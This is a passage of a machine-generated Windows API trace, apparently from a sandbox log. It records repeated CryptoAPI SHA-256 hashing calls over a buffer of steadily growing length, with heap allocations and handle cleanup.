	[0102.145] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247428, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247428, pdwDataLen=0x12941c) returned 1
	[0102.145] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.145] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.145] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.145] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.145] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0102.145] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247450
	[0102.145] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247450, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247450, pdwDataLen=0x12941c) returned 1
	[0102.146] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.146] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.146] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.146] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.146] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0102.146] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247478
	[0102.146] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247478, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247478, pdwDataLen=0x12941c) returned 1
	[0102.146] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.146] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.146] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.146] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.146] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0102.147] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2474a0
	[0102.147] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2474a0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2474a0, pdwDataLen=0x12941c) returned 1
	[0102.147] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.147] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.147] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.147] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.147] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0102.147] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2474c8
	[0102.147] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2474c8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2474c8, pdwDataLen=0x12941c) returned 1
	[0102.147] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.147] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.147] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.148] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.148] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0102.148] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2474f0
	[0102.148] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2474f0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2474f0, pdwDataLen=0x12941c) returned 1
	[0102.148] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.148] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.148] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.148] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.148] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0102.148] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247518
	[0102.148] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247518, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247518, pdwDataLen=0x12941c) returned 1
	[0102.148] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.148] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.148] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.149] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.149] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0102.149] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.149] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247540
	[0102.149] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247540, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247540, pdwDataLen=0x12941c) returned 1
	[0102.149] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.149] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.149] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.149] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.149] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0102.149] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.149] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247568
	[0102.149] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247568, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247568, pdwDataLen=0x12941c) returned 1
	[0102.149] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.149] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.149] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.150] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.150] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0102.150] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.150] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247590
	[0102.150] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247590, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247590, pdwDataLen=0x12941c) returned 1
	[0102.150] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.150] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.150] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.150] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.150] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0102.150] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.150] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2475b8
	[0102.150] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2475b8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2475b8, pdwDataLen=0x12941c) returned 1
	[0102.151] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.151] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.151] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.151] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.151] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0102.151] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2475e0
	[0102.151] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2475e0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2475e0, pdwDataLen=0x12941c) returned 1
	[0102.151] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.151] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.151] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.151] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.151] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0102.152] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247608
	[0102.152] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247608, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247608, pdwDataLen=0x12941c) returned 1
	[0102.152] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.152] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.152] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.152] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.152] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0102.152] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247630
	[0102.152] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247630, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247630, pdwDataLen=0x12941c) returned 1
	[0102.152] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.152] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.152] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.153] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.153] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0102.153] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.153] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247658
	[0102.153] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247658, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247658, pdwDataLen=0x12941c) returned 1
	[0102.153] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.153] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.153] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.153] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.153] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0102.153] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.153] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247680
	[0102.153] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247680, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247680, pdwDataLen=0x12941c) returned 1
	[0102.153] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.153] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.153] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.154] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.154] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0102.154] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2476a8
	[0102.154] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2476a8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2476a8, pdwDataLen=0x12941c) returned 1
	[0102.154] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.154] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.154] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.154] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.154] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0102.154] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2476d0
	[0102.154] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2476d0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2476d0, pdwDataLen=0x12941c) returned 1
	[0102.154] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.154] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.154] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.155] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.155] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0102.155] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.155] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2476f8
	[0102.155] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2476f8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2476f8, pdwDataLen=0x12941c) returned 1
	[0102.155] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.155] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.155] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.155] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.155] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0102.155] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.155] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247720
	[0102.155] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247720, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247720, pdwDataLen=0x12941c) returned 1
	[0102.156] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.156] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.156] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.156] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.156] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0102.156] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.156] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247748
	[0102.156] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247748, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247748, pdwDataLen=0x12941c) returned 1
	[0102.156] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.156] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.156] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.156] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.156] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0102.157] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247770
	[0102.157] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247770, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247770, pdwDataLen=0x12941c) returned 1
	[0102.157] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.157] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.157] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.157] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.157] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0102.157] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247798
	[0102.157] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247798, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247798, pdwDataLen=0x12941c) returned 1
	[0102.157] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.157] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.157] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.158] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.158] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0102.158] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.158] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2477c0
	[0102.158] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2477c0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2477c0, pdwDataLen=0x12941c) returned 1
	[0102.158] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.158] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.158] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.158] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.158] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0102.158] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.158] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2477e8
	[0102.158] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2477e8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2477e8, pdwDataLen=0x12941c) returned 1
	[0102.158] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.158] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.158] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.159] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.159] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0102.159] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.159] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247810
	[0102.159] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247810, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247810, pdwDataLen=0x12941c) returned 1
	[0102.159] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.159] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.159] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.159] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.159] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0102.159] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.159] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247838
	[0102.159] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247838, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247838, pdwDataLen=0x12941c) returned 1
